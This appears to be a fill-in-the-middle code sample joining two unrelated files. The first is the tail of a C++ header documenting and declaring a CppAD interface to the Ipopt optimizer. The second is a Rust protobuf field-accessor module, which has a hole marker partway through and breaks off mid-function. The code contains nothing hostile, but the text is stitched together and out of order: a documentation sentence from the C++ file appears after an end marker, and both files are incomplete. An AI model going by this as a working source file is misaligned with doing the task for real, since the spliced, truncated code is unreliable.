Number %solution%.obj_value
%$$
It is the final value of the objective function $latex f(x)$$.
$children%
cppad_ipopt/example/get_started.cpp%
cppad_ipopt/example/ode1.omh%
cppad_ipopt/speed/ode_speed.cpp
%$$
$head Example$$
The file
$cref ipopt_nlp_get_started.cpp$$ is an example and test of
$code cppad_ipopt_nlp$$ that uses the
$cref/simple representation/cppad_ipopt_nlp/Simple Representation/$$.
It returns true if it succeeds and false otherwise.
The section $cref ipopt_nlp_ode$$ discusses an example that
uses a more complex representation.
$head Wish List$$
This is a list of possible future improvements to
$code cppad_ipopt_nlp$$ that would require changed to the user interface:
$list number$$
The routine $codei%fg_info.eval_r(%k%, %u%)%$$ should also support
$codei NumberVector$$ for the type of the argument $code u$$
(this would certainly be more efficient when
$codei%fg_info.retape(%k%)%$$ is true and $latex L(k) > 1$$).
It could be an option for the user to provide this as well as
the necessary $code ADVector$$ definition.
$lnext
There should a $cref Discrete$$ routine that the user can call
to determine the value of $latex \ell$$ during the evaluation of
$codei%fg_info.eval_r(%k%, %u%)%$$.
This way data, which does not affect the derivative values,
can be included in the function recording and evaluation.
$lend
$end
-----------------------------------------------------------------------------
*/
# include <cppad/cppad.hpp>
# include <coin/IpIpoptApplication.hpp>
# include <coin/IpTNLP.hpp>
/*!
\file cppad_ipopt_nlp.hpp
\brief CppAD interface to Ipopt
\ingroup cppad_ipopt_nlp_cpp
*/
// ---------------------------------------------------------------------------
namespace cppad_ipopt {
// ---------------------------------------------------------------------------
/// A scalar value used to record operation sequence.
typedef CppAD::AD<Ipopt::Number> ADNumber;
/// A simple vector of values used to record operation sequence
typedef CppAD::vector<ADNumber> ADVector;
/// A simple vector of size_t values.
typedef CppAD::vector<size_t> SizeVector;
/// A simple vector of values used by Ipopt
typedef CppAD::vector<Ipopt::Number> NumberVector;
/*!
Abstract base class user derives from to define the funcitons in the problem.
*/
class cppad_ipopt_fg_info
{
/// allow cppad_ipopt_nlp class complete access to this class
friend class cppad_ipopt_nlp;
private:
/// domain space dimension for the functions f(x), g(x)
size_t n_;
/// range space dimension for the function g(x)
size_t m_;
/// the cppad_ipopt_nlp constructor uses this method to set n_
void set_n(size_t n)
{ n_ = n; }
/// the cppad_ipopt_nlp constructor uses this method to set m_
void set_m(size_t m)
{ m_ = m; }
public:
/// destructor virtual so user derived class destructor gets called
virtual ~cppad_ipopt_fg_info(void)
{ }
/// number_functions; i.e. K (simple representation uses 1)
virtual size_t number_functions(void)
{ return 1; }
/// function that evaluates the users representation for f(x) and
/// and g(x) is pure virtual so user must define it in derived class
virtual ADVector eval_r(size_t k, const ADVector& u) = 0;
/// should the function r_k (u) be retaped when ever the arguemnt
/// u changes (default is true which is safe but slow)
virtual bool retape(size_t k)
{ return true; }
/// domain_size q[k] for r_k (u) (simple representation uses n)
virtual size_t domain_size(size_t k)
{ return n_; }
/// range_size p[k] for r_k (u) (simple representation uses m+1)
virtual size_t range_size(size_t k)
{ return m_ + 1; }
/// number_terms that use r_k (u) (simple represenation uses 1)
virtual size_t number_terms(size_t k)
{ return 1; }
/// return the index vectors I_{k,ell} and J_{k,ell}
/// (simple representation uses I[i] = i and J[j] = j)
virtual void index(size_t k, size_t ell, SizeVector& I, SizeVector& J)
{ assert( I.size() >= m_ + 1 );
assert( J.size() >= n_ );
for(size_t i = 0; i <= m_; i++)
I[i] = i;
for(size_t j = 0; j < n_; j++)
J[j] = j;
}
};
/*!
Class that contains information about the problem solution
\section Nonlinear_Programming_Problem Nonlinear Programming Problem
We are give smooth functions
\f$ f : {\bf R}^n \rightarrow {\bf R} \f$
and
\f$ g : {\bf R}^n \rightarrow {\bf R}^m \f$
and wish to solve the problem
\f[
\begin{array}{rcl}
{\rm minimize} & f(x) & {\rm w.r.t.} \; x \in {\bf R}^n
\\
{\rm subject \; to} & g^l \leq g(x) \leq g^u
\\
& x^l \leq x \leq x^u
\end{array}
\f]
\section Users_Representation Users Representation
The functions
\f$ f : {\bf R}^n \rightarrow {\bf R} \f$ and
\f$ g : {\bf R}^n \rightarrow {\bf R}^m \f$ are defined by
\f[
\left( \begin{array}{c} f(x) \\ g(x) \end{array} \right)
=
\sum_{k=0}^{K-1} \; \sum_{\ell=0}^{L(k) - 1}
[ (m+1) \otimes I_{k,\ell} ] \; \circ
\; r_k \; \circ \; [ J_{k,\ell} \otimes n ] \; (x)
\f]
where for \f$ k = 0 , \ldots , K-1\f$,
\f$ r_k : {\bf R}^{q(k)} \rightarrow {\bf R}^{p(k)} \f$.
\section Deprecated_Evaluation_Methods Evaluation Methods
The set of evaluation methods for this class is
\verbatim
{ eval_f, eval_grad_f, eval_g, eval_jac_g, eval_h }
\endverbatim
Note that the \c bool return flag for the evaluations methods
does not appear in the Ipopt documentation.
Looking at the code, it seems to be a flag telling Ipopt to abort
when the flag is false.
*/
class cppad_ipopt_solution
{
public:
/// possible values for he solution status
enum solution_status {
not_defined,
success,
maxiter_exceeded,
stop_at_tiny_step,
stop_at_acceptable_point,
local_infeasibility,
user_requested_stop,
feasible_point_found,
diverging_iterates,
restoration_failure,
error_in_step_computation,
invalid_number_detected,
too_few_degrees_of_freedom,
internal_error,
unknown
} status;
/// the approximation solution
NumberVector x;
/// Lagrange multipliers corresponding to lower bounds on x
NumberVector z_l;
/// Lagrange multipliers corresponding to upper bounds on x
NumberVector z_u;
/// value of g(x)
NumberVector g;
/// Lagrange multipliers correspondiing constraints on g(x)
NumberVector lambda;
/// value of f(x)
Ipopt::Number obj_value;
/// constructor initializes solution status as not yet defined
cppad_ipopt_solution(void)
{ status = not_defined; }
};
/*!
Class connects Ipopt to CppAD for derivative and sparsity pattern calculations.
*/
class cppad_ipopt_nlp : public Ipopt::TNLP
{
private:
/// A Scalar value used by Ipopt
typedef Ipopt::Number Number;
/// An index value used by Ipopt
typedef Ipopt::Index Index;
/// Indexing style used in Ipopt sparsity structure
typedef Ipopt::TNLP::IndexStyleEnum IndexStyleEnum;
/// A simple vector of boolean values
typedef CppAD::vectorBool BoolVector;
/// A simple vector of AD function objects
typedef CppAD::vector< CppAD::ADFun<Number> > ADFunVector;
/// A simple vector of simple vectors of boolean values
typedef CppAD::vector<BoolVector> BoolVectorVector;
/// A mapping that is dense in i, sparse in j, and maps (i, j)
/// to the corresponding sparsity index in Ipopt.
typedef CppAD::vector< std::map<size_t,size_t> > IndexMap;
// ------------------------------------------------------------------
// Values directly passed in to constuctor
// ------------------------------------------------------------------
/// dimension of the domain space for f(x) and g(x)
/// (passed to ctor)
const size_t n_;
/// dimension of the range space for g(x)
/// (passed to ctor)
const size_t m_;
/// dimension of the range space for g(x)
/// (passed to ctor)
const NumberVector x_i_;
/// lower limit for x
/// (size n_), (passed to ctor)
const NumberVector x_l_;
/// upper limit for x
/// (size n_) (passed to ctor)
const NumberVector x_u_;
/// lower limit for g(x)
/// (size m_) (passed to ctor)
const NumberVector g_l_;
/// upper limit for g(x)
/// (size m_) (passed to ctor)
const NumberVector g_u_;
/// pointer to base class version of derived class object used to get
/// information about the user's representation for f(x) and g(x)
/// (passed to ctor)
cppad_ipopt_fg_info* const fg_info_;
/// pointer to object where final results are stored
/// (passed to ctor)
cppad_ipopt_solution* const solution_;
/// plus infinity as a value of type Number
const Number infinity_;
// ------------------------------------------------------------------
// Effectively const values determined during constructor using calls
// to fg_info:
// ------------------------------------------------------------------
/// The value of \f$ K \f$ in the representation.
/// (effectively const)
size_t K_;
/// Does operation sequence for \f$ r_k (u) \f$ depend on \f$ u \f$.
/// (size K_) (effectively const)
BoolVector retape_;
/// <tt>q_[k]</tt> is the domain space dimension for \f$ r_k (u) \f$
/// (size K_) (effectively const)
SizeVector q_;
/// <tt>p_[k]</tt> is the range space dimension for \f$ r_k (u) \f$
/// (size K_) (effectively const)
SizeVector p_;
/// <tt>L_[k]</tt> is number of times \f$ r_k (u) \f$ appears in
/// the representation summation
/// (size K_) (effectively const)
SizeVector L_;
// -------------------------------------------------------------------
// Other effectively const values determined by the constructor:
// -------------------------------------------------------------------
/*!
CppAD sparsity patterns for \f$ \{ r_k^{(1)} (u) \} \f$ (set by ctor).
For <tt>k = 0 , ... , K_-1, pattern_jac_r_[k]</tt>
is a CppAD sparsity pattern for the Jacobian of \f$ r_k (u) \f$
and as such it has size <tt>p_[k]*q_[k]</tt>.
(effectively const)
*/
BoolVectorVector pattern_jac_r_;
/*!
CppAD sparsity patterns for \f$ \{ r_k^{(2)} (u) \} \f$ (set by ctor).
For <tt>k = 0 , ... , K_-1, pattern_jac_r_[k]</tt>
is a CppAD sparsity pattern for the Hessian of
\f[
R(u) = \sum_{i=0}^{p[k]-1} r_k (u)_i
\f]
and as such it has size <tt>q_[k]*q_[k]</tt>.
(effectively const)
*/
BoolVectorVector pattern_hes_r_;
/// number non-zero is Ipopt sparsity structor for Jacobian of g(x)
/// (effectively const)
size_t nnz_jac_g_;
/// row indices in Ipopt sparsity structor for Jacobian of g(x)
/// (effectively const)
SizeVector iRow_jac_g_;
/// column indices in Ipopt sparsity structor for Jacobian of g(x)
/// (effectively const)
SizeVector jCol_jac_g_;
/// number non-zero is Ipopt sparsity structor for Hessian of Lagragian
/// (effectively const)
size_t nnz_h_lag_;
/// row indices in Ipopt sparsity structor for Hessian of Lagragian
/// (effectively const)
SizeVector iRow_h_lag_;
/// column indices in Ipopt sparsity structor for Hessian of Lagragian
/// (effectively const)
SizeVector jCol_h_lag_;
/*!
Mapping from (i, j) in Jacobian of g(x) to Ipopt sparsity structure
For <tt>i = 0 , ... , m_-1, index_jac_g_[i]</tt>
is a standard map from column index values \c j to the corresponding
index in the Ipopt sparsity structure for the Jacobian of g(x).
*/
IndexMap index_jac_g_;
/*!
Mapping from (i, j) in Hessian of fg(x) to Ipopt sparsity structure
For <tt>i = 0 , ... , n_-1, index_hes_fg_[i]</tt>
is a standard map from column index values \c j to the corresponding
index in the Ipopt sparsity structure for the Hessian of the Lagragian.
*/
IndexMap index_hes_fg_;
// -----------------------------------------------------------------
// Values that are changed by routine other than the constructor:
// -----------------------------------------------------------------
/// For <tt>k = 0 , ... , K_-1, r_fun_[k]</tt>
/// is a the CppAD function object corresponding to \f$ r_k (u) \f$.
ADFunVector r_fun_;
/*!
Is r_fun[k] OK for current x.
For <tt>k = 0 , ... , K_-1, tape_ok_[k]</tt>
is true if current operations sequence in <tt>r_fun_[k]</tt>
OK for this value of \f$ x \f$.
Note that \f$ u = [ J_{k,\ell} \otimes n ] (x) \f$ may depend on the
value of \f$ \ell \f$.
*/
BoolVector tape_ok_;
/// work space of size equal maximum of <tt>q[k]</tt> w.r.t \c k.
SizeVector J_;
/// work space of size equal maximum of <tt>p[k]</tt> w.r.t \c k.
SizeVector I_;
// ------------------------------------------------------------
// Private Methods
// ------------------------------------------------------------
/// block the default constructor from use
cppad_ipopt_nlp(const cppad_ipopt_nlp&);
/// blocks the assignment operator from use
cppad_ipopt_nlp& operator=(const cppad_ipopt_nlp&);
public:
// ----------------------------------------------------------------
// See cppad_ipopt_nlp.cpp for doxygen documentation of these methods
// ----------------------------------------------------------------
/// only constructor for cppad_ipopot_nlp
cppad_ipopt_nlp(
size_t n ,
size_t m ,
const NumberVector &x_i ,
const NumberVector &x_l ,
const NumberVector &x_u ,
const NumberVector &g_l ,
const NumberVector &g_u ,
cppad_ipopt_fg_info* fg_info ,
cppad_ipopt_solution* solution
);
// use virtual so that derived class destructor gets called.
virtual ~cppad_ipopt_nlp();
// return info about the nlp
virtual bool get_nlp_info(
Index& n ,
Index& m ,
Index& nnz_jac_g ,
Index& nnz_h_lag ,
IndexStyleEnum& index_style
);
// return bounds for my problem
virtual bool get_bounds_info(
Index n ,
Number* x_l ,
Number* x_u ,
Index m ,
Number* g_l ,
Number* g_u
);
// return the starting point for the algorithm
virtual bool get_starting_point(
Index n ,
bool init_x ,
Number* x ,
bool init_z ,
Number* z_L ,
Number* z_U ,
Index m ,
bool init_lambda ,
Number* lambda
);
// return the objective value
virtual bool eval_f(
Index n ,
const Number* x ,
bool new_x ,
Number& obj_value
);
// Method to return the gradient of the objective
virtual bool eval_grad_f(
Index n ,
const Number* x ,
bool new_x ,
Number* grad_f
);
// return the constraint residuals
virtual bool eval_g(
Index n ,
const Number* x ,
bool new_x ,
Index m ,
Number* g
);
// Method to return:
// 1) The structure of the jacobian (if "values" is NULL)
// 2) The values of the jacobian (if "values" is not NULL)
virtual bool eval_jac_g(
Index n ,
const Number* x ,
bool new_x ,
Index m ,
Index nele_jac ,
Index* iRow ,
Index* jCol ,
Number* values
);
// Method to return:
// 1) structure of hessian of the lagrangian (if "values" is NULL)
// 2) values of hessian of the lagrangian (if "values" is not NULL)
virtual bool eval_h(
Index n ,
const Number* x ,
bool new_x ,
Number obj_factor ,
Index m ,
const Number* lambda ,
bool new_lambda ,
Index nele_hess ,
Index* iRow ,
Index* jCol ,
Number* values
);
// called when the algorithm is completed so the TNLP can
// store/write the solution
virtual void finalize_solution(
Ipopt::SolverReturn status ,
Index n ,
const Number* x ,
const Number* z_L ,
const Number* z_U ,
Index m ,
const Number* g ,
const Number* lambda ,
Number obj_value ,
const Ipopt::IpoptData* ip_data ,
Ipopt::IpoptCalculatedQuantities* ip_cq
);
virtual bool intermediate_callback(
Ipopt::AlgorithmMode mode,
Index iter,
Number obj_value,
Number inf_pr,
Number inf_du,
Number mu,
Number d_norm,
Number regularization_size,
Number alpha_du,
Number alpha_pr,
Index ls_trials,
const Ipopt::IpoptData* ip_data,
Ipopt::IpoptCalculatedQuantities* ip_cq
);
};
// ---------------------------------------------------------------------------
} // end namespace cppad_ipopt
// ---------------------------------------------------------------------------
# endif<|fim▁end|> | We define an $icode index vector$$ as a vector of non-negative integers |
<|file_name|>accessor.rs<|end_file_name|><|fim▁begin|>use core::Message;
use core::ProtobufEnum;
use core::message_down_cast;
use reflect::EnumValueDescriptor;
/// this trait should not be used directly, use `FieldDescriptor` instead
pub trait FieldAccessor {
fn name_generic(&self) -> &'static str;
fn has_field_generic(&self, m: &Message) -> bool;
fn len_field_generic(&self, m: &Message) -> usize;
fn get_message_generic<'a>(&self, m: &'a Message) -> &'a Message;
fn get_rep_message_item_generic<'a>(&self, m: &'a Message, index: usize) -> &'a Message;
fn get_enum_generic(&self, m: &Message) -> &'static EnumValueDescriptor;
fn get_rep_enum_item_generic(&self, m: &Message, index: usize) -> &'static EnumValueDescriptor;
fn get_str_generic<'a>(&self, m: &'a Message) -> &'a str;
fn get_rep_str_generic<'a>(&self, m: &'a Message) -> &'a [String];
fn get_bytes_generic<'a>(&self, m: &'a Message) -> &'a [u8];
fn get_rep_bytes_generic<'a>(&self, m: &'a Message) -> &'a [Vec<u8>];
fn get_u32_generic(&self, m: &Message) -> u32;
fn get_rep_u32_generic<'a>(&self, m: &'a Message) -> &'a [u32];
fn get_u64_generic(&self, m: &Message) -> u64;
fn get_rep_u64_generic<'a>(&self, m: &'a Message) -> &'a [u64];
fn get_i32_generic(&self, m: &Message) -> i32;
fn get_rep_i32_generic<'a>(&self, m: &'a Message) -> &'a [i32];
fn get_i64_generic(&self, m: &Message) -> i64;
fn get_rep_i64_generic<'a>(&self, m: &'a Message) -> &'a [i64];
fn get_bool_generic(&self, m: &Message) -> bool;
fn get_rep_bool_generic<'a>(&self, m: &'a Message) -> &'a [bool];
fn get_f32_generic(&self, m: &Message) -> f32;
fn get_rep_f32_generic<'a>(&self, m: &'a Message) -> &'a [f32];
fn get_f64_generic(&self, m: &Message) -> f64;
fn get_rep_f64_generic<'a>(&self, m: &'a Message) -> &'a [f64];
}
trait GetSingularMessage<M> {
fn get_message<'a>(&self, m: &'a M) -> &'a Message;
}
struct GetSingularMessageImpl<M, N> {
get: for<'a> fn(&'a M) -> &'a N,
}
impl<M : Message, N : Message + 'static> GetSingularMessage<M> for GetSingularMessageImpl<M, N> {
fn get_message<'a>(&self, m: &'a M) -> &'a Message {
(self.get)(m)
}
}
trait GetSingularEnum<M> {
fn get_enum(&self, m: &M) -> &'static EnumValueDescriptor;
}
struct GetSingularEnumImpl<M, E> {
get: fn(&M) -> E,
}
impl<M : Message, E : ProtobufEnum> GetSingularEnum<M> for GetSingularEnumImpl<M, E> {
fn get_enum(&self, m: &M) -> &'static EnumValueDescriptor {
(self.get)(m).descriptor()
}
}
trait GetRepeatedMessage<M> {
fn len_field(&self, m: &M) -> usize;
fn get_message_item<'a>(&self, m: &'a M, index: usize) -> &'a Message;
}
struct GetRepeatedMessageImpl<M, N> {
get: for<'a> fn(&'a M) -> &'a [N],
}
impl<M : Message, N : Message + 'static> GetRepeatedMessage<M> for GetRepeatedMessageImpl<M, N> {
fn len_field(&self, m: &M) -> usize {
(self.get)(m).len()
}
fn get_message_item<'a>(&self, m: &'a M, index: usize) -> &'a Message {
&(self.get)(m)[index]
}
}
trait GetRepeatedEnum<M> {
fn len_field(&self, m: &M) -> usize;
fn get_enum_item(&self, m: &M, index: usize) -> &'static EnumValueDescriptor;
}
struct GetRepeatedEnumImpl<M, E> {
get: for<'a> fn(&'a M) -> &'a [E],
}
impl<M : Message, E : ProtobufEnum> GetRepeatedEnum<M> for GetRepeatedEnumImpl<M, E> {
fn len_field(&self, m: &M) -> usize {
(self.get)(m).len()
}
fn get_enum_item(&self, m: &M, index: usize) -> &'static EnumValueDescriptor {
(self.get)(m)[index].descriptor()
}
}
enum SingularGet<M> {
U32(fn(&M) -> u32),
U64(fn(&M) -> u64),
I32(fn(&M) -> i32),
I64(fn(&M) -> i64),
F32(fn(&M) -> f32),
F64(fn(&M) -> f64),
Bool(fn(&M) -> bool),
String(for<'a> fn(&'a M) -> &'a str),
Bytes(for<'a> fn(&'a M) -> &'a [u8]),
Enum(Box<GetSingularEnum<M> + 'static>),
Message(Box<GetSingularMessage<M> + 'static>),
}
enum RepeatedGet<M> {
U32(for<'a> fn(&'a M) -> &'a [u32]),
U64(for<'a> fn(&'a M) -> &'a [u64]),
I32(for<'a> fn(&'a M) -> &'a [i32]),
I64(for<'a> fn(&'a M) -> &'a [i64]),
F32(for<'a> fn(&'a M) -> &'a [f32]),
F64(for<'a> fn(&'a M) -> &'a [f64]),
Bool(for<'a> fn(&'a M) -> &'a [bool]),
String(for<'a> fn(&'a M) -> &'a [String]),
Bytes(for<'a> fn(&'a M) -> &'a [Vec<u8>]),
Enum(Box<GetRepeatedEnum<M> + 'static>),
Message(Box<GetRepeatedMessage<M> + 'static>),
}
impl<M : Message> RepeatedGet<M> {
fn len_field(&self, m: &M) -> usize {
match *self {
RepeatedGet::U32(get) => get(m).len(),
RepeatedGet::U64(get) => get(m).len(),
RepeatedGet::I32(get) => get(m).len(),
RepeatedGet::I64(get) => get(m).len(),
RepeatedGet::F32(get) => get(m).len(),
RepeatedGet::F64(get) => get(m).len(),
RepeatedGet::Bool(get) => get(m).len(),
RepeatedGet::String(get) => get(m).len(),
RepeatedGet::Bytes(get) => get(m).len(),
RepeatedGet::Enum(ref get) => get.len_field(m),
RepeatedGet::Message(ref get) => get.len_field(m),
}
}
}
enum FieldAccessorFunctions<M> {
Singular { has: fn(&M) -> bool, get: SingularGet<M> },
Repeated(RepeatedGet<M>),
}
struct FieldAccessorImpl<M> {
name: &'static str,
fns: FieldAccessorFunctions<M>,
}
impl<M : Message + 'static> FieldAccessor for FieldAccessorImpl<M> {
fn name_generic(&self) -> &'static str {
self.name
}
fn has_field_generic(&self, m: &Message) -> bool {
match self.fns {
FieldAccessorFunctions::Singular { has, .. } => has(message_down_cast(m)),
_ => panic!(),
}
}
fn len_field_generic(&self, m: &Message) -> usize {
match self.fns {
FieldAccessorFunctions::Repeated(ref r) => r.len_field(message_down_cast(m)),
_ => panic!(),
}
}
fn get_message_generic<'a>(&self, m: &'a Message) -> &'a Message {
match self.fns {
FieldAccessorFunctions::Singular { get: SingularGet::Message(ref get), .. } =>
get.get_message(message_down_cast(m)),
_ => panic!(),
}
}
fn get_enum_generic(&self, m: &Message) -> &'static EnumValueDescriptor {
match self.fns {
FieldAccessorFunctions::Singular { get: SingularGet::Enum(ref get), .. } =>
get.get_enum(message_down_cast(m)),
_ => panic!(),
}
}
fn get_str_generic<'a>(&self, m: &'a Message) -> &'a str {
match self.fns {
FieldAccessorFunctions::Singular { get: SingularGet::String(get), .. } =>
get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_bytes_generic<'a>(&self, m: &'a Message) -> &'a [u8] {
match self.fns {
FieldAccessorFunctions::Singular { get: SingularGet::Bytes(get), .. } =>
get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_u32_generic(&self, m: &Message) -> u32 {
match self.fns {
FieldAccessorFunctions::Singular { get: SingularGet::U32(get), .. } =>
get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_u64_generic(&self, m: &Message) -> u64 {
match self.fns {
FieldAccessorFunctions::Singular { get: SingularGet::U64(get), .. } =>
get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_i32_generic(&self, m: &Message) -> i32 {
match self.fns {
FieldAccessorFunctions::Singular { get: SingularGet::I32(get), .. } =>
get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_i64_generic(&self, m: &Message) -> i64 {
match self.fns {
FieldAccessorFunctions::Singular { get: SingularGet::I64(get), .. } =>
get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_f32_generic(&self, m: &Message) -> f32 {
match self.fns {
FieldAccessorFunctions::Singular { get: SingularGet::F32(get), .. } =>
get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_f64_generic(&self, m: &Message) -> f64 {
match self.fns {
FieldAccessorFunctions::Singular { get: SingularGet::F64(get), .. } =>
get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_bool_generic(&self, m: &Message) -> bool {
match self.fns {
FieldAccessorFunctions::Singular { get: SingularGet::Bool(get), .. } =>
get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_rep_message_item_generic<'a>(&self, m: &'a Message, index: usize) -> &'a Message {
match self.fns {
FieldAccessorFunctions::Repeated(RepeatedGet::Message(ref get)) =>
get.get_message_item(message_down_cast(m), index),
_ => panic!(),
}
}
fn get_rep_enum_item_generic(&self, m: &Message, index: usize) -> &'static EnumValueDescriptor {
match self.fns {
FieldAccessorFunctions::Repeated(RepeatedGet::Enum(ref get)) =>
get.get_enum_item(message_down_cast(m), index),
_ => panic!(),
}
}
fn get_rep_str_generic<'a>(&self, m: &'a Message) -> &'a [String] {
match self.fns {
FieldAccessorFunctions::Repeated(RepeatedGet::String(get)) => get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_rep_bytes_generic<'a>(&self, m: &'a Message) -> &'a [Vec<u8>] {
match self.fns {
FieldAccessorFunctions::Repeated(RepeatedGet::Bytes(get)) => get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_rep_u32_generic<'a>(&self, m: &'a Message) -> &'a [u32] {
match self.fns {
FieldAccessorFunctions::Repeated(RepeatedGet::U32(get)) => get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_rep_u64_generic<'a>(&self, m: &'a Message) -> &'a [u64] {
match self.fns {
FieldAccessorFunctions::Repeated(RepeatedGet::U64(get)) => get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_rep_i32_generic<'a>(&self, m: &'a Message) -> &'a [i32] {
match self.fns {
FieldAccessorFunctions::Repeated(RepeatedGet::I32(get)) => get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_rep_i64_generic<'a>(&self, m: &'a Message) -> &'a [i64] {
match self.fns {
FieldAccessorFunctions::Repeated(RepeatedGet::I64(get)) => get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_rep_f32_generic<'a>(&self, m: &'a Message) -> &'a [f32] {
match self.fns {
FieldAccessorFunctions::Repeated(RepeatedGet::F32(get)) => get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_rep_f64_generic<'a>(&self, m: &'a Message) -> &'a [f64] {
match self.fns {
FieldAccessorFunctions::Repeated(RepeatedGet::F64(get)) => get(message_down_cast(m)),
_ => panic!(),
}
}
fn get_rep_bool_generic<'a>(&self, m: &'a Message) -> &'a [bool] {
match self.fns {
FieldAccessorFunctions::Repeated(RepeatedGet::Bool(get)) => get(message_down_cast(m)),
_ => panic!(),
}
}
}
// singular
pub fn make_singular_u32_accessor<M : Message + 'static>(
name: &'static str,
has: fn(&M) -> bool,
get: fn(&M) -> u32,
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Singular {
has: has,
get: SingularGet::U32(get),
},
})
}
pub fn make_singular_i32_accessor<M : Message + 'static>(
name: &'static str,
has: fn(&M) -> bool,
get: fn(&M) -> i32,
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Singular {
has: has,
get: SingularGet::I32(get),
},
})
}
pub fn make_singular_u64_accessor<M : Message + 'static>(
name: &'static str,
has: fn(&M) -> bool,
get: fn(&M) -> u64,
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Singular {
has: has,
get: SingularGet::U64(get),
},
})
}
pub fn make_singular_i64_accessor<M : Message + 'static>(
name: &'static str,
has: fn(&M) -> bool,
get: fn(&M) -> i64,
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Singular {
has: has,
get: SingularGet::I64(get),
},
})
}
pub fn make_singular_f32_accessor<M : Message + 'static>(
name: &'static str,
has: fn(&M) -> bool,
get: fn(&M) -> f32,
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Singular {
has: has,
get: SingularGet::F32(get),
},
})
}
pub fn make_singular_f64_accessor<M : Message + 'static>(
name: &'static str,
has: fn(&M) -> bool,
get: fn(&M) -> f64,
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Singular {
has: has,
get: SingularGet::F64(get),
},
})
}
pub fn make_singular_bool_accessor<M : Message + 'static>(
name: &'static str,
has: fn(&M) -> bool,
get: fn(&M) -> bool,
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Singular {
has: has,
get: SingularGet::Bool(get),
},
})
}
pub fn make_singular_string_accessor<M : Message + 'static>(
name: &'static str,
has: fn(&M) -> bool,
get: for<'a> fn(&'a M) -> &'a str,
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Singular {
has: has,
get: SingularGet::String(get),
},
})
}
pub fn make_singular_bytes_accessor<M : Message + 'static>(
name: &'static str,
has: fn(&M) -> bool,
get: for<'a> fn(&'a M) -> &'a [u8],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Singular {
has: has,
get: SingularGet::Bytes(get),
},
})
}
pub fn make_singular_enum_accessor<M : Message + 'static, E : ProtobufEnum + 'static>(
name: &'static str,
has: fn(&M) -> bool,
get: fn(&M) -> E,
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Singular {
has: has,
get: SingularGet::Enum(
Box::new(GetSingularEnumImpl { get: get }),
),
},
})
}
pub fn make_singular_message_accessor<M : Message + 'static, F : Message + 'static>(
name: &'static str,
has: fn(&M) -> bool,
get: for<'a> fn(&'a M) -> &'a F,
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Singular {
has: has,
get: SingularGet::Message(
Box::new(GetSingularMessageImpl { get: get }),
),
},
})
}
// repeated
pub fn make_repeated_u32_accessor<M : Message + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [u32],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Repeated(RepeatedGet::U32(get)),
})
}
pub fn make_repeated_i32_accessor<M : Message + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [i32],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Repeated(RepeatedGet::I32(get)),
})
}
pub fn make_repeated_u64_accessor<M : Message + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [u64],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Repeated(RepeatedGet::U64(get)),
})
}
pub fn make_repeated_i64_accessor<M : Message + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [i64],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Repeated(RepeatedGet::I64(get)),
})
}
pub fn make_repeated_f32_accessor<M : Message + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [f32],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Repeated(RepeatedGet::F32(get)),
})
}
pub fn make_repeated_f64_accessor<M : Message + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [f64],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,<|fim▁hole|>
pub fn make_repeated_bool_accessor<M : Message + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [bool],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
fns: FieldAccessorFunctions::Repeated(RepeatedGet::Bool(get)),
})
}
pub fn make_repeated_string_accessor<M : Message + 'static>(
name: &'static str,
get: for<'a> fn(&'a M) -> &'a [String],
) -> Box<FieldAccessor + 'static>
{
Box::new(FieldAccessorImpl {
name: name,
